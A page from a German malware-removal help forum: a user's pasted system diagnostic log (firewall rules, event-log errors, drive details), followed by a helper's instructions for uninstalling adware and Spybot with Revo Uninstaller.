FirewallRules: [{EA243917-0ED1-4AC3-892E-E75E69E85ADD}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
FirewallRules: [{33F72E10-AFF6-4BCA-8C05-FDDFA7F7F7C3}] => C:\Program Files\Cimatron\CimatronE\Program\CimRemoteRedConsolHost.exe
FirewallRules: [{68CB1F80-BA9C-482D-BB2D-677FFBFEF16A}] => C:\Program Files\Cimatron\CimatronE\Program\CimatronE.exe
FirewallRules: [{A171EC02-48FD-4221-AB23-6005EE5637B4}] => C:\Program Files\Cimatron\CimatronE\Program\CimRemoteBoxManager.exe
FirewallRules: [{65380630-63BE-4835-A178-BCADECC758AA}] => C:\Program Files (x86)\Steam\steamapps\common\Leap of Fate\LoF.exe
FirewallRules: [{B5CFDA5D-8776-4383-8F5F-B76FA77C5ADF}] => C:\Program Files (x86)\Steam\steamapps\common\Leap of Fate\LoF.exe
FirewallRules: [{6907F5CD-3E9A-4E9A-AF7D-659F15399D49}] => C:\Program Files (x86)\Steam\steamapps\common\Legends of Pixelia\Legends of Pixelia.exe
FirewallRules: [{3CECCF84-A0F4-4A26-8EE4-2A1C7244B235}] => C:\Program Files (x86)\Steam\steamapps\common\Legends of Pixelia\Legends of Pixelia.exe
FirewallRules: [{612445B6-6A40-49B6-AE58-804F7BF90422}] => C:\Program Files\Cimatron\CimatronE\Program\CimRemoteRedConsolHost.exe
FirewallRules: [{EACCBFE3-C8CD-41C5-A91F-AD18D3CBF08E}] => C:\Program Files\Cimatron\CimatronE\Program\CimRemoteWorker.exe
FirewallRules: [{3F7B93DA-04CF-47CE-BE6A-1FAB0995F92B}] => C:\WINDOWS\system32\hasplms.exe
FirewallRules: [{096A419B-62BA-441A-BC77-FAB03072256A}] => C:\Cimatron E13\Program\CimRemoteRedConsolHost.exe
FirewallRules: [{8680F965-A9EC-4271-93B4-505F6466C0FF}] => C:\Cimatron E13\Program\CimatronE.exe
FirewallRules: [{DDCA80CC-D6CE-4D39-BD18-C101BBA5076A}] => C:\Cimatron E13\Program\CimRemoteBoxManager.exe
FirewallRules: [{9935DE82-D3C7-455A-8148-E4A2BD21DCBC}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{990A8079-F4EB-4509-BCBF-E059611C3FC7}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{185A022C-9E6A-4647-B71A-6B9817AA1CBF}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{575809EB-3973-4A72-8D33-7DC5F16342B7}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{B6A4366A-DA4F-43E4-8555-F125769D7C8B}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{7F74F2FC-B42F-4D71-B201-0195D17FD6E5}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{985C7414-DC1D-4E82-94E3-CC2605D736AB}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{54195CC1-AD9D-4998-8172-921D05D97089}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{566CF440-5F41-42BC-86E1-2C64124490AD}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{81E0ED6C-D16A-43EE-B7F5-99A91E6C597D}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{7A016A10-0A8B-4273-A89D-7AEB693826F3}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{B8A5162A-D06B-4D53-BE24-312DBF4B8203}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{EDE1A8F3-1D58-4D6F-8967-04297A1197AB}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{BC483936-A171-4A92-9AA9-3C52D2BEF9F8}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{CF4146B2-62E6-48E4-8478-F24375111FC5}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{4FB6FE8F-7145-4338-ABFE-E412FFEF8412}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{56A8A485-3B98-480F-BFAE-6DF7A0212840}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{03DBD3CA-1AD9-40FA-8F02-939EAECDB990}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{5A23DF0C-FE19-46C9-9D70-171735056747}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{A25A85F0-2797-4A9B-9340-5769313C4323}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{BEEA45A0-3546-4241-AAF9-ED51EB1A1644}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{2C9200BD-1504-4379-981E-A01B1FB2B1C0}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{5BFCE98B-5E70-4DB8-B281-F4259913B610}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{6860966F-7701-4302-88B3-FF5B39DF7EC2}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{B751DED2-5796-45A5-AFB5-6AA8CF25308A}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{A402CC30-5D3C-41DD-A0A4-9F862F947A64}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{B3976A15-41DD-4BCB-9BFA-02A8CA5D0E93}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{B9AE4A8A-2213-49B2-85F3-5819E5D8E9DD}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{06FB5740-E816-43A3-BD23-3B737FCD031E}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{B31C6B22-6986-41C8-8625-18EFA04F06B6}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{372BA32F-C576-4485-8B0C-2B21686E362E}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{6D3DCEDE-22AC-4DAA-8B7E-3EAE40BB8E73}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{BBA09CFE-8FFC-4E12-8F79-17581FF99D51}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{4A38FEC6-47EA-4DBA-85DB-F3165E2755A4}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{E0125ADA-5CAA-4A26-B106-DE3EAD794F4A}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{25366F8D-4DB8-4544-9C5C-3A1F5C4AA82B}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{2E709EE1-79E0-4A30-AD23-30A0594C0EC0}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{DEC9358B-ED88-48DF-965E-238A03FAB10A}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{8E722A9E-3D82-41C9-A6BC-042ECA42C3D5}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{393DA665-55A1-4B7F-9044-BB0AD113F3D8}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{C4A26A66-A7EC-417F-A8E9-CCBB78D38B91}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{DD1A2841-49AB-414A-9FB6-3A7205E015A5}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{65995093-15F6-444F-B8EE-C2B97DF5C04F}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{DF61DDC9-3D41-4E72-853B-BDAA2F2BC223}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{C45AD099-CB85-460B-803E-E4A51392C38B}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{647D2FEC-9540-4098-8901-49CB0CC72BA7}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{1F608F1A-4F10-46B5-B6FA-E299724EC679}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{97289FA1-85A7-4225-806A-A5E034E602E0}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{CE57EF4C-239D-4A77-A9CF-673A3F733419}] => C:\Program Files (x86)\Steam\steamapps\common\HeroSiege\bin\Hero_Siege.exe
FirewallRules: [{A1BA72F8-F488-4AB8-B8EE-CE1E1DA04261}] => C:\Program Files (x86)\Steam\steamapps\common\HeroSiege\bin\Hero_Siege.exe
FirewallRules: [{49452CC4-C124-40D7-866B-BDA3D10CA632}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{58AD4E86-91F1-4263-A4C6-AD79F7FD9918}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{4DE9B0A0-7B7F-41DD-B115-71532D9EDB63}] => C:\Program Files (x86)\Steam\steamapps\common\Phantom Breaker Battle Grounds\bin\pbbg_win32.exe
FirewallRules: [{F6D306F3-0054-4B9C-B691-00FC88976995}] => C:\Program Files (x86)\Steam\steamapps\common\Phantom Breaker Battle Grounds\bin\pbbg_win32.exe
FirewallRules: [{6F765953-4976-4714-804A-811BAFA6E151}] => C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{F2E9BBF5-2EC3-4983-B606-1F61508156B7}] => C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{686D3529-E62B-4E90-A104-7B60BBC05F23}] => C:\Program Files (x86)\Steam\steamapps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{D7E4966C-BAE8-468F-94CC-55E2BAEA1D50}] => C:\Program Files (x86)\Steam\steamapps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{7DA1BAD8-2869-47BA-B670-7859687B0ACC}] => C:\Program Files (x86)\Steam\steamapps\common\DeathRoadToCanada\prog.exe
FirewallRules: [{3CC78B1C-2CC4-4BCD-BF1E-E90514237A9C}] => C:\Program Files (x86)\Steam\steamapps\common\DeathRoadToCanada\prog.exe
FirewallRules: [{295417FD-3BEA-4490-BAD6-11124DF16ACC}] => C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{1917382F-FD06-4FBC-ACFE-3AA457FE67B7}] => C:\WINDOWS\system32\rundll32.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Wiederherstellungspunkte =========================

28-11-2016 17:33:57 Geplanter Prüfpunkt
01-12-2016 20:34:10 DirectX wurde installiert
02-12-2016 23:16:12 JRT Pre-Junkware Removal
02-12-2016 23:42:43 JRT Pre-Junkware Removal

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (12/04/2016 09:21:01 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.


Systemfehler:
=============
Error: (12/05/2016 05:09:37 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/05/2016 06:03:31 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/04/2016 07:07:28 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/04/2016 12:13:30 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/03/2016 09:29:50 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Plattformdienst für verbundene Geräte" wurde mit folgendem Fehler beendet:
Unbekannter Fehler

Error: (12/03/2016 09:29:17 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Netzwerkdienst" (SID: S-1-5-20) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{3185A766-B338-11E4-A71E-12E3F512A338}
 und der APPID
{7006698D-2974-4091-A424-85DD0B909E23}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/03/2016 09:29:09 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Netzwerkdienst" (SID: S-1-5-20) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{3185A766-B338-11E4-A71E-12E3F512A338}
 und der APPID
{7006698D-2974-4091-A424-85DD0B909E23}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/03/2016 09:27:53 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/03/2016 09:27:21 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Search" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/03/2016 09:27:21 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Presentation Foundation-Schriftartcache 3.0.0.0" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts.


CodeIntegrity:
===================================
  Date: 2016-10-11 15:44:29.852
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe) attempted to load \Device\HarddiskVolume4\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe that did not meet the Microsoft signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i7-3612QM CPU @ 2.10GHz
Prozentuale Nutzung des RAM: 35%
Installierter physikalischer RAM: 8007.27 MB
Verfügbarer physikalischer RAM: 5134.51 MB
Summe virtueller Speicher: 9287.27 MB
Verfügbarer virtueller Speicher: 6220.81 MB

==================== Laufwerke ================================

Drive c: (SSD) (Fixed) (Total:231.52 GB) (Free:81.45 GB) NTFS
Drive d: (HDD) (Fixed) (Total:465.76 GB) (Free:143.6 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 00000000)

Partition: GPT.

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: 08CA1AAA)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

cosinus 05.12.2016 22:55
Da ist noch diese eine Adware :wtf:
Die muss weg. Bei der Gelegenheit das völlig untaugliche Spybot gleich auch wegknallen


Lade Dir bitte von hier Revo Uninstaller Download Revo Uninstaller (alternativ portable Revo Uninstaller) herunter.
  • Installiere und starte das Programm. (Bebilderte Anleitung zu Revo Uninstaller)
  • Klicke auf Optionen und wähle als Sprache Deutsch.
  • Suche im Uninstallerfeld nach den Programmen:

    Spybot

    SnapDo

  • Wähle die Programme nacheinander aus und klicke jedes Mal auf Uninstall.
  • Wähle anschließend den Modus "Moderat" aus.
  • Reste löschen:
    Klicke auf dann auf und dann auf .

 


Alle Zeitangaben in WEZ +1. Es ist jetzt 00:54 Uhr.
Seite 2 von 3 1 2 3
100 Beiträge dieses Themas auf einer Seite anzeigen

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131